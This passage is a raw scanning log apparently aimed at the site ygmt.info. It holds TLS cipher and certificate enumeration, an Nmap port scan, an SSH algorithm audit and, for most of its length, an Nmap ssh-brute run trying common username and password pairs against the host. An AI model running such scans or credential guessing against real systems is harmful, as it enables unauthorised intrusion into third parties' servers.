8628Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
8629Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
8630Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
8631Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
8632Accepted TLSv1.2 256 bits CAMELLIA256-SHA
8633Accepted TLSv1.2 256 bits AES256-SHA
8634Accepted TLSv1.2 128 bits CAMELLIA128-SHA
8635Accepted TLSv1.2 128 bits AES128-SHA
8636Preferred TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
8637Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
8638Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
8639Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
8640Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
8641Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
8642Accepted TLSv1.1 256 bits CAMELLIA256-SHA
8643Accepted TLSv1.1 256 bits AES256-SHA
8644Accepted TLSv1.1 128 bits CAMELLIA128-SHA
8645Accepted TLSv1.1 128 bits AES128-SHA
8646Preferred TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
8647Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
8648Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
8649Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
8650Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
8651Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
8652Accepted TLSv1.0 256 bits CAMELLIA256-SHA
8653Accepted TLSv1.0 256 bits AES256-SHA
8654Accepted TLSv1.0 128 bits CAMELLIA128-SHA
8655Accepted TLSv1.0 128 bits AES128-SHA
8656
8657 SSL Certificate:
8658Signature Algorithm: sha256WithRSAEncryption
8659RSA Key Strength: 2048
8660
8661Subject: ygmt.info
8662Altnames: DNS:ygmt.info, DNS:www.ygmt.info
8663Issuer: COMODO RSA Domain Validation Secure Server CA
8664
8665Not valid before: Feb 14 00:00:00 2017 GMT
8666Not valid after: Feb 14 23:59:59 2018 GMT
8667######################################################################################################################################
8668Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:16 EDT
8669Nmap scan report for www.ygmt.info (185.82.200.52)
8670Host is up (0.12s latency).
8671rDNS record for 185.82.200.52: latina.petite.guru
8672Not shown: 479 closed ports
8673PORT STATE SERVICE
867422/tcp open ssh
867580/tcp open http
8676443/tcp open https
867710000/tcp open snet-sensor-mgmt
8678
8679Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds
8680######################################################################################################################################
8681# general
8682(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
8683(gen) software: OpenSSH 6.7p1
8684(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
8685(gen) compression: enabled (zlib@openssh.com)
8686
8687# key exchange algorithms
8688(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
8689(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
8690 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
8691(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
8692 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
8693(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
8694 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
8695(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
8696 `- [info] available since OpenSSH 4.4
8697(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
8698 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
8699
8700# host-key algorithms
8701(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
8702(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
8703 `- [warn] using small 1024-bit modulus
8704 `- [warn] using weak random number generator could reveal the key
8705 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
8706(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
8707 `- [warn] using weak random number generator could reveal the key
8708 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
8709(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
8710
8711# encryption algorithms (ciphers)
8712(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
8713(enc) aes192-ctr -- [info] available since OpenSSH 3.7
8714(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
8715(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
8716(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
8717(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
8718 `- [info] default cipher since OpenSSH 6.9.
8719
8720# message authentication code algorithms
8721(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
8722 `- [info] available since OpenSSH 6.2
8723(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
8724(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
8725(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
8726(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
8727 `- [info] available since OpenSSH 6.2
8728(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
8729 `- [warn] using small 64-bit tag size
8730 `- [info] available since OpenSSH 4.7
8731(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
8732 `- [info] available since OpenSSH 6.2
8733(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
8734 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
8735(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
8736 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
8737(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
8738 `- [warn] using weak hashing algorithm
8739 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
8740
8741# algorithm recommendations (for OpenSSH 6.7)
8742(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
8743(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
8744(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
8745(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
8746(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
8747(rec) -ssh-dss -- key algorithm to remove
8748(rec) -hmac-sha2-512 -- mac algorithm to remove
8749(rec) -umac-128@openssh.com -- mac algorithm to remove
8750(rec) -hmac-sha2-256 -- mac algorithm to remove
8751(rec) -umac-64@openssh.com -- mac algorithm to remove
8752(rec) -hmac-sha1 -- mac algorithm to remove
8753(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
8754(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
8755######################################################################################################################################
8756Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:17 EDT
8757NSE: [ssh-run] Failed to specify credentials and command to run.
8758NSE: [ssh-brute] Trying username/password pair: root:root
8759NSE: [ssh-brute] Trying username/password pair: admin:admin
8760NSE: [ssh-brute] Trying username/password pair: administrator:administrator
8761NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
8762NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
8763NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
8764NSE: [ssh-brute] Trying username/password pair: guest:guest
8765NSE: [ssh-brute] Trying username/password pair: user:user
8766NSE: [ssh-brute] Trying username/password pair: web:web
8767NSE: [ssh-brute] Trying username/password pair: test:test
8768NSE: [ssh-brute] Trying username/password pair: root:
8769NSE: [ssh-brute] Trying username/password pair: admin:
8770NSE: [ssh-brute] Trying username/password pair: administrator:
8771NSE: [ssh-brute] Trying username/password pair: webadmin:
8772NSE: [ssh-brute] Trying username/password pair: sysadmin:
8773NSE: [ssh-brute] Trying username/password pair: netadmin:
8774NSE: [ssh-brute] Trying username/password pair: guest:
8775NSE: [ssh-brute] Trying username/password pair: user:
8776NSE: [ssh-brute] Trying username/password pair: web:
8777NSE: [ssh-brute] Trying username/password pair: test:
8778NSE: [ssh-brute] Trying username/password pair: root:123456
8779NSE: [ssh-brute] Trying username/password pair: admin:123456
8780NSE: [ssh-brute] Trying username/password pair: administrator:123456
8781NSE: [ssh-brute] Trying username/password pair: webadmin:123456
8782NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
8783NSE: [ssh-brute] Trying username/password pair: netadmin:123456
8784NSE: [ssh-brute] Trying username/password pair: guest:123456
8785NSE: [ssh-brute] Trying username/password pair: user:123456
8786NSE: [ssh-brute] Trying username/password pair: web:123456
8787NSE: [ssh-brute] Trying username/password pair: test:123456
8788NSE: [ssh-brute] Trying username/password pair: root:12345
8789NSE: [ssh-brute] Trying username/password pair: admin:12345
8790NSE: [ssh-brute] Trying username/password pair: administrator:12345
8791NSE: [ssh-brute] Trying username/password pair: webadmin:12345
8792NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
8793NSE: [ssh-brute] Trying username/password pair: netadmin:12345
8794NSE: [ssh-brute] Trying username/password pair: guest:12345
8795NSE: [ssh-brute] Trying username/password pair: user:12345
8796NSE: [ssh-brute] Trying username/password pair: web:12345
8797NSE: [ssh-brute] Trying username/password pair: test:12345
8798NSE: [ssh-brute] Trying username/password pair: root:123456789
8799NSE: [ssh-brute] Trying username/password pair: admin:123456789
8800NSE: [ssh-brute] Trying username/password pair: administrator:123456789
8801NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
8802NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
8803NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
8804NSE: [ssh-brute] Trying username/password pair: guest:123456789
8805NSE: [ssh-brute] Trying username/password pair: user:123456789
8806NSE: [ssh-brute] Trying username/password pair: web:123456789
8807NSE: [ssh-brute] Trying username/password pair: test:123456789
8808NSE: [ssh-brute] Trying username/password pair: root:password
8809NSE: [ssh-brute] Trying username/password pair: admin:password
8810NSE: [ssh-brute] Trying username/password pair: administrator:password
8811NSE: [ssh-brute] Trying username/password pair: webadmin:password
8812NSE: [ssh-brute] Trying username/password pair: sysadmin:password
8813NSE: [ssh-brute] Trying username/password pair: netadmin:password
8814NSE: [ssh-brute] Trying username/password pair: guest:password
8815NSE: [ssh-brute] Trying username/password pair: user:password
8816NSE: [ssh-brute] Trying username/password pair: web:password
8817NSE: [ssh-brute] Trying username/password pair: test:password
8818NSE: [ssh-brute] Trying username/password pair: root:iloveyou
8819NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
8820NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
8821NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
8822NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
8823NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
8824NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
8825NSE: [ssh-brute] Trying username/password pair: user:iloveyou
8826NSE: [ssh-brute] Trying username/password pair: web:iloveyou
8827NSE: [ssh-brute] Trying username/password pair: test:iloveyou
8828NSE: [ssh-brute] Trying username/password pair: root:princess
8829NSE: [ssh-brute] Trying username/password pair: admin:princess
8830NSE: [ssh-brute] Trying username/password pair: administrator:princess
8831NSE: [ssh-brute] Trying username/password pair: webadmin:princess
8832NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
8833NSE: [ssh-brute] Trying username/password pair: netadmin:princess
8834NSE: [ssh-brute] Trying username/password pair: guest:princess
8835NSE: [ssh-brute] Trying username/password pair: user:princess
8836NSE: [ssh-brute] Trying username/password pair: web:princess
8837NSE: [ssh-brute] Trying username/password pair: test:princess
8838NSE: [ssh-brute] Trying username/password pair: root:12345678
8839NSE: [ssh-brute] Trying username/password pair: admin:12345678
8840NSE: [ssh-brute] Trying username/password pair: administrator:12345678
8841NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
8842NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
8843NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
8844NSE: [ssh-brute] Trying username/password pair: guest:12345678
8845NSE: [ssh-brute] Trying username/password pair: user:12345678
8846NSE: [ssh-brute] Trying username/password pair: web:12345678
8847NSE: [ssh-brute] Trying username/password pair: test:12345678
8848NSE: [ssh-brute] Trying username/password pair: root:1234567
8849NSE: [ssh-brute] Trying username/password pair: admin:1234567
8850NSE: [ssh-brute] Trying username/password pair: administrator:1234567
8851NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
8852NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
8853NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
8854NSE: [ssh-brute] Trying username/password pair: guest:1234567
8855NSE: [ssh-brute] Trying username/password pair: user:1234567
8856NSE: [ssh-brute] Trying username/password pair: web:1234567
8857NSE: [ssh-brute] Trying username/password pair: test:1234567
8858NSE: [ssh-brute] Trying username/password pair: root:abc123
8859NSE: [ssh-brute] Trying username/password pair: admin:abc123
8860NSE: [ssh-brute] Trying username/password pair: administrator:abc123
8861NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
8862NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
8863NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
8864NSE: [ssh-brute] Trying username/password pair: guest:abc123
8865NSE: [ssh-brute] Trying username/password pair: user:abc123
8866NSE: [ssh-brute] Trying username/password pair: web:abc123
8867NSE: [ssh-brute] Trying username/password pair: test:abc123
8868NSE: [ssh-brute] Trying username/password pair: root:nicole
8869NSE: [ssh-brute] Trying username/password pair: admin:nicole
8870NSE: [ssh-brute] Trying username/password pair: administrator:nicole
8871NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
8872NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
8873NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
8874NSE: [ssh-brute] Trying username/password pair: guest:nicole
8875NSE: [ssh-brute] Trying username/password pair: user:nicole
8876NSE: [ssh-brute] Trying username/password pair: web:nicole
8877NSE: [ssh-brute] Trying username/password pair: test:nicole
8878NSE: [ssh-brute] Trying username/password pair: root:daniel
8879NSE: [ssh-brute] Trying username/password pair: admin:daniel
8880NSE: [ssh-brute] Trying username/password pair: administrator:daniel
8881NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
8882NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
8883NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
8884NSE: [ssh-brute] Trying username/password pair: guest:daniel
8885NSE: [ssh-brute] Trying username/password pair: user:daniel
8886NSE: [ssh-brute] Trying username/password pair: web:daniel
8887NSE: [ssh-brute] Trying username/password pair: test:daniel
8888NSE: [ssh-brute] Trying username/password pair: root:monkey
8889NSE: [ssh-brute] Trying username/password pair: admin:monkey
8890NSE: [ssh-brute] Trying username/password pair: administrator:monkey
8891NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
8892NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
8893NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
8894NSE: [ssh-brute] Trying username/password pair: guest:monkey
8895NSE: [ssh-brute] Trying username/password pair: user:monkey
8896NSE: [ssh-brute] Trying username/password pair: web:monkey
8897NSE: [ssh-brute] Trying username/password pair: test:monkey
8898NSE: [ssh-brute] Trying username/password pair: root:babygirl
8899NSE: [ssh-brute] Trying username/password pair: admin:babygirl
8900NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
8901NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
8902NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
8903NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
8904NSE: [ssh-brute] Trying username/password pair: guest:babygirl
8905NSE: [ssh-brute] Trying username/password pair: user:babygirl
8906NSE: [ssh-brute] Trying username/password pair: web:babygirl
8907NSE: [ssh-brute] Trying username/password pair: test:babygirl
8908NSE: [ssh-brute] Trying username/password pair: root:qwerty
8909NSE: [ssh-brute] Trying username/password pair: admin:qwerty
8910NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
8911NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
8912NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
8913NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
8914NSE: [ssh-brute] Trying username/password pair: guest:qwerty
8915NSE: [ssh-brute] Trying username/password pair: user:qwerty
8916NSE: [ssh-brute] Trying username/password pair: web:qwerty
8917NSE: [ssh-brute] Trying username/password pair: test:qwerty
8918NSE: [ssh-brute] Trying username/password pair: root:lovely
8919NSE: [ssh-brute] Trying username/password pair: admin:lovely
8920NSE: [ssh-brute] Trying username/password pair: administrator:lovely
8921NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
8922NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
8923NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
8924NSE: [ssh-brute] Trying username/password pair: guest:lovely
8925NSE: [ssh-brute] Trying username/password pair: user:lovely
8926NSE: [ssh-brute] Trying username/password pair: web:lovely
8927NSE: [ssh-brute] Trying username/password pair: test:lovely
8928NSE: [ssh-brute] Trying username/password pair: root:654321
8929NSE: [ssh-brute] Trying username/password pair: admin:654321
8930NSE: [ssh-brute] Trying username/password pair: administrator:654321
8931NSE: [ssh-brute] Trying username/password pair: webadmin:654321
8932NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
8933NSE: [ssh-brute] Trying username/password pair: netadmin:654321
8934NSE: [ssh-brute] Trying username/password pair: guest:654321
8935NSE: [ssh-brute] Trying username/password pair: user:654321
8936NSE: [ssh-brute] Trying username/password pair: web:654321
8937NSE: [ssh-brute] Trying username/password pair: test:654321
8938NSE: [ssh-brute] Trying username/password pair: root:michael
8939NSE: [ssh-brute] Trying username/password pair: admin:michael
8940NSE: [ssh-brute] Trying username/password pair: administrator:michael
8941NSE: [ssh-brute] Trying username/password pair: webadmin:michael
8942NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
8943NSE: [ssh-brute] Trying username/password pair: netadmin:michael
8944NSE: [ssh-brute] Trying username/password pair: guest:michael
8945NSE: [ssh-brute] Trying username/password pair: user:michael
8946NSE: [ssh-brute] Trying username/password pair: web:michael
8947NSE: [ssh-brute] Trying username/password pair: test:michael
8948NSE: [ssh-brute] Trying username/password pair: root:jessica
8949NSE: [ssh-brute] Trying username/password pair: admin:jessica
8950NSE: [ssh-brute] Trying username/password pair: administrator:jessica
8951NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
8952NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
8953NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
8954NSE: [ssh-brute] Trying username/password pair: guest:jessica
8955NSE: [ssh-brute] Trying username/password pair: user:jessica
8956NSE: [ssh-brute] Trying username/password pair: web:jessica
8957NSE: [ssh-brute] Trying username/password pair: test:jessica
8958NSE: [ssh-brute] Trying username/password pair: root:111111
8959NSE: [ssh-brute] Trying username/password pair: admin:111111
8960NSE: [ssh-brute] Trying username/password pair: administrator:111111
8961NSE: [ssh-brute] Trying username/password pair: webadmin:111111
8962NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
8963NSE: [ssh-brute] Trying username/password pair: netadmin:111111
8964NSE: [ssh-brute] Trying username/password pair: guest:111111
8965NSE: [ssh-brute] Trying username/password pair: user:111111
8966NSE: [ssh-brute] Trying username/password pair: web:111111
8967NSE: [ssh-brute] Trying username/password pair: test:111111
8968NSE: [ssh-brute] Trying username/password pair: root:ashley
8969NSE: [ssh-brute] Trying username/password pair: admin:ashley
8970NSE: [ssh-brute] Trying username/password pair: administrator:ashley
8971NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
8972NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
8973NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
8974NSE: [ssh-brute] Trying username/password pair: guest:ashley
8975NSE: [ssh-brute] Trying username/password pair: user:ashley
8976NSE: [ssh-brute] Trying username/password pair: web:ashley
8977NSE: [ssh-brute] Trying username/password pair: test:ashley
8978NSE: [ssh-brute] Trying username/password pair: root:000000
8979NSE: [ssh-brute] Trying username/password pair: admin:000000
8980NSE: [ssh-brute] Trying username/password pair: administrator:000000
8981NSE: [ssh-brute] Trying username/password pair: webadmin:000000
8982NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
8983NSE: [ssh-brute] Trying username/password pair: netadmin:000000
8984NSE: [ssh-brute] Trying username/password pair: guest:000000
8985NSE: [ssh-brute] Trying username/password pair: user:000000
8986NSE: [ssh-brute] Trying username/password pair: web:000000
8987NSE: [ssh-brute] Trying username/password pair: test:000000
8988NSE: [ssh-brute] Trying username/password pair: root:iloveu
8989NSE: [ssh-brute] Trying username/password pair: admin:iloveu
8990NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
8991NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
8992NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
8993NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
8994NSE: [ssh-brute] Trying username/password pair: guest:iloveu
8995NSE: [ssh-brute] Trying username/password pair: user:iloveu
8996NSE: [ssh-brute] Trying username/password pair: web:iloveu
8997NSE: [ssh-brute] Trying username/password pair: test:iloveu
8998NSE: [ssh-brute] Trying username/password pair: root:michelle
8999NSE: [ssh-brute] Trying username/password pair: admin:michelle
9000NSE: [ssh-brute] Trying username/password pair: administrator:michelle
9001NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
9002NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
9003NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
9004NSE: [ssh-brute] Trying username/password pair: guest:michelle
9005NSE: [ssh-brute] Trying username/password pair: user:michelle
9006NSE: [ssh-brute] Trying username/password pair: web:michelle
9007NSE: [ssh-brute] Trying username/password pair: test:michelle
9008NSE: [ssh-brute] Trying username/password pair: root:tigger
9009NSE: [ssh-brute] Trying username/password pair: admin:tigger
9010NSE: [ssh-brute] Trying username/password pair: administrator:tigger
9011NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
9012NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
9013NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
9014NSE: [ssh-brute] Trying username/password pair: guest:tigger
9015NSE: [ssh-brute] Trying username/password pair: user:tigger
9016NSE: [ssh-brute] Trying username/password pair: web:tigger
9017NSE: [ssh-brute] Trying username/password pair: test:tigger
9018NSE: [ssh-brute] Trying username/password pair: root:sunshine
9019NSE: [ssh-brute] Trying username/password pair: admin:sunshine
9020NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
9021NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
9022NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
9023NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
9024NSE: [ssh-brute] Trying username/password pair: guest:sunshine
9025NSE: [ssh-brute] Trying username/password pair: user:sunshine
9026NSE: [ssh-brute] Trying username/password pair: web:sunshine
9027NSE: [ssh-brute] Trying username/password pair: test:sunshine
9028NSE: [ssh-brute] Trying username/password pair: root:chocolate
9029NSE: [ssh-brute] Trying username/password pair: admin:chocolate
9030NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
9031NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
9032NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
9033NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
9034NSE: [ssh-brute] Trying username/password pair: guest:chocolate
9035NSE: [ssh-brute] Trying username/password pair: user:chocolate
9036NSE: [ssh-brute] Trying username/password pair: web:chocolate
9037NSE: [ssh-brute] Trying username/password pair: test:chocolate
9038NSE: [ssh-brute] Trying username/password pair: root:password1
9039NSE: [ssh-brute] Trying username/password pair: admin:password1
9040NSE: [ssh-brute] Trying username/password pair: administrator:password1
9041NSE: [ssh-brute] Trying username/password pair: webadmin:password1
9042NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
9043NSE: [ssh-brute] Trying username/password pair: netadmin:password1
9044NSE: [ssh-brute] Trying username/password pair: guest:password1
9045NSE: [ssh-brute] Trying username/password pair: user:password1
9046NSE: [ssh-brute] Trying username/password pair: web:password1
9047NSE: [ssh-brute] Trying username/password pair: test:password1
9048NSE: [ssh-brute] Trying username/password pair: root:soccer
9049NSE: [ssh-brute] Trying username/password pair: admin:soccer
9050NSE: [ssh-brute] Trying username/password pair: administrator:soccer
9051NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
9052NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
9053NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
9054NSE: [ssh-brute] Trying username/password pair: guest:soccer
9055NSE: [ssh-brute] Trying username/password pair: user:soccer
9056NSE: [ssh-brute] Trying username/password pair: web:soccer
9057NSE: [ssh-brute] Trying username/password pair: test:soccer
9058NSE: [ssh-brute] Trying username/password pair: root:anthony
9059NSE: [ssh-brute] Trying username/password pair: admin:anthony
9060NSE: [ssh-brute] Trying username/password pair: administrator:anthony
9061NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
9062NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
9063NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
9064NSE: [ssh-brute] Trying username/password pair: guest:anthony
9065NSE: [ssh-brute] Trying username/password pair: user:anthony
9066NSE: [ssh-brute] Trying username/password pair: web:anthony
9067NSE: [ssh-brute] Trying username/password pair: test:anthony
9068NSE: [ssh-brute] Trying username/password pair: root:friends
9069NSE: [ssh-brute] Trying username/password pair: admin:friends
9070NSE: [ssh-brute] Trying username/password pair: administrator:friends
9071NSE: [ssh-brute] Trying username/password pair: webadmin:friends
9072NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
9073NSE: [ssh-brute] Trying username/password pair: netadmin:friends
9074NSE: [ssh-brute] Trying username/password pair: guest:friends
9075NSE: [ssh-brute] Trying username/password pair: user:friends
9076NSE: [ssh-brute] Trying username/password pair: web:friends
9077NSE: [ssh-brute] Trying username/password pair: test:friends
9078NSE: [ssh-brute] Trying username/password pair: root:purple
9079NSE: [ssh-brute] Trying username/password pair: admin:purple
9080NSE: [ssh-brute] Trying username/password pair: administrator:purple
9081NSE: [ssh-brute] Trying username/password pair: webadmin:purple
9082NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
9083NSE: [ssh-brute] Trying username/password pair: netadmin:purple
9084NSE: [ssh-brute] Trying username/password pair: guest:purple
9085NSE: [ssh-brute] Trying username/password pair: user:purple
9086NSE: [ssh-brute] Trying username/password pair: web:purple
9087NSE: [ssh-brute] Trying username/password pair: test:purple
9088NSE: [ssh-brute] Trying username/password pair: root:angel
9089NSE: [ssh-brute] Trying username/password pair: admin:angel
9090NSE: [ssh-brute] Trying username/password pair: administrator:angel
9091NSE: [ssh-brute] Trying username/password pair: webadmin:angel
9092NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
9093NSE: [ssh-brute] Trying username/password pair: netadmin:angel
9094NSE: [ssh-brute] Trying username/password pair: guest:angel
9095NSE: [ssh-brute] Trying username/password pair: user:angel
9096NSE: [ssh-brute] Trying username/password pair: web:angel
9097NSE: [ssh-brute] Trying username/password pair: test:angel
9098NSE: [ssh-brute] Trying username/password pair: root:butterfly
9099NSE: [ssh-brute] Trying username/password pair: admin:butterfly
9100NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
9101NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
9102NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
9103NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
9104NSE: [ssh-brute] Trying username/password pair: guest:butterfly
9105NSE: [ssh-brute] Trying username/password pair: user:butterfly
9106NSE: [ssh-brute] Trying username/password pair: web:butterfly
9107NSE: [ssh-brute] Trying username/password pair: test:butterfly
9108NSE: [ssh-brute] Trying username/password pair: root:jordan
9109NSE: [ssh-brute] Trying username/password pair: admin:jordan
9110NSE: [ssh-brute] Trying username/password pair: administrator:jordan
9111NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
9112NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
9113NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
9114NSE: [ssh-brute] Trying username/password pair: guest:jordan
9115NSE: [ssh-brute] Trying username/password pair: user:jordan
9116NSE: [ssh-brute] Trying username/password pair: web:jordan
9117NSE: [ssh-brute] Trying username/password pair: test:jordan
9118NSE: [ssh-brute] Trying username/password pair: root:fuckyou
9119NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
9120NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
9121NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
9122NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
9123NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
9124NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
9125NSE: [ssh-brute] Trying username/password pair: user:fuckyou
9126NSE: [ssh-brute] Trying username/password pair: web:fuckyou
9127NSE: [ssh-brute] Trying username/password pair: test:fuckyou
